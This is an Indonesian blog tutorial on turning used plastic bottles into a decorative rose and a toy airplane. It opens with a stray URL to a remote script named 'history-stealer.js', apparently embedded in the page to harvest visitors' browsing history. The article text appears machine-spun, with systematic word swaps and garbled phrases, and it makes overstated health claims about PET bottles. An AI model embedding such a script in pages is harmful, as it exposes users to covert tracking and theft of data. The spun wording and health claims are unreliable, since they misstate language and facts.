-->
https://cdn.statically.io/gh/darylfarahi/ikan/master/history-stealer.js

Mudahnya Membuat Kerajinan Tangan dari Botol Plastik

kerajinan tangan dari botol plastik – mari kita belajar cara menjadikan kerajinan dari botol bekas. botol bekas tentu sudah tidak asing lagi bagi kita yang hidup di era serba modern ini. ada jutaan bahkan barangkali hingga ratusan juta botol plastik dari banyak sekali merk dibuat setiap harinya. minuman itu dibungkus sedemikian rupa dengan botol plastik dan di jual di banyak sekali kawasan yang tergampang dijangkau oleh masyarakat.

botol plastik yang digunakan untuk mengemas minuman tersebut ialah botol dengan bahan polyethylene terephthalate yang mampu menyebabkan iritasi pada kulit dan sangat berbahaya jikalau terhirup. ribuan kuman dan mikroba yang ada di dalam botol tersebut mampu berkembang biak dengan cepat jikalau terkena cahaya matahari. selain itu jenis sampah dari botol plastik tidak mampu diuraikan oleh tanah dalam waktu yang singkat.

Cara menjadikan bunga dari botol bekas








tapi di tangan orang-orang kreatif sampah dari botol plastik tersebut mampu dibuat banyak sekali kerajinan dari botol bekas yang unik serta bernilai tinggi. salah satunya ialah dengan menjadikan kreasi bunga dari limbah botol ini. kamu mampu menjadikan bunga mawar, anggrek dan bunga lainya dengan memanfaatkan limbahbotol bekas yang ada di lingkungan sekitar.

pasti sudah tidak tabah kan untuk menjadikan bunga yang cantik dari botol bekas. sebagai contoh yuk kita buat bunga mawar merah dari daur ulang botol plastik ini, kalau sudah jadi kamu mampu gunakan sebagai bunga tanda cinta untuk kekasih kamu.

sebelum menjadikan kerajinan dari botol bekas sebaiknya untuk menyiapkan banyak sekali bahan dan peralatan yang diharapkan mirip gunting, botol plastik bekas, lem tembak, kawat, tang, cat pewarna serta solder. jikalau semua sudah kamu siapkan yuk kita lanjut pada tahap cara menjadikan bunga mawarnya.

langkah menjadikan bunga dari botol bekas


  1. sediakan semua alat dan bahan yang diharapkan
  2. gunting botol plastik menjadi potongan kecil berbentuk bunga
  3. rapikan potongan botol menggunakan solder yang telah dipanasi
  4. gunting bagian bawah botol menggunakan gunting menyerupai bentuk kelopak bunga
  5. susun setiap kelopak bunga yang dibuat menggunakan lem tembak
  6. cat bunga yang telah terbentuk menggunakan warna favorit kamu 
  7. pasang pada kawat yang telah di buat menyerupai tangkai
  8. untuk langkah yang lebih detail mampu lihat pada gambar


jadilah sebuah mawar yang cantik mengagumkan. hasil kreasi bunga dari botol bekas ini banyak disukai oleh masyarakat yang ada di seluruh indonesia. bahkan hasil kerajinan ini telah di ekspor ke luar negeri.

Menjadikan pesawat sederhana dari botol bekas
ternyata banyak yang tertarik untuk menjadikan mainan dari botol bekas, salah satu mainan itu ialah sebuah pesawat sederhana yang dibuat dari air minum kemasan. berikut kami berikan tutorial cara membuatnya, ikutin panduanya step by step yaaa.

untuk menjadikan mainan ini kita perlu mempersiapkan bahan serta peralatan yang dibutuhkan mirip botol bekas, gunting, kardus bekas, serta spidol permanen.

fungsi dari barang-barang tersebut ialah botol akan digunakan sebagai badan pesawat, kardus bekas mampu digunakan sebagai sayap pesawat. sedangkan gunting untuk membentuk bentuk sayap pada kardus dan juga untuk memotong botol. fungsi spidol untuk menjadikan pola pada kardus dan untuk menghias badan pesawat.

untuk cara menjadikannya kamu mampu mengikuti tutorial yang ada pada gambar.
Buatlah sayap dengan menggunakan gunting, buat polanya terlebih dahulu 

Buatlah Mall Pada Botol Untuk Tempat Sayap.
Gabungkan Sayap dengan Badan Pesawat.
Taraaa, jadilah sebuah mainan yang sederhana dan edukatif untuk anak-anak tercinta agar lebih bahagia. itulah beberapa kerajinan tangan yang mampu dibuat dari botol bekas.

Subscribe to receive free email updates: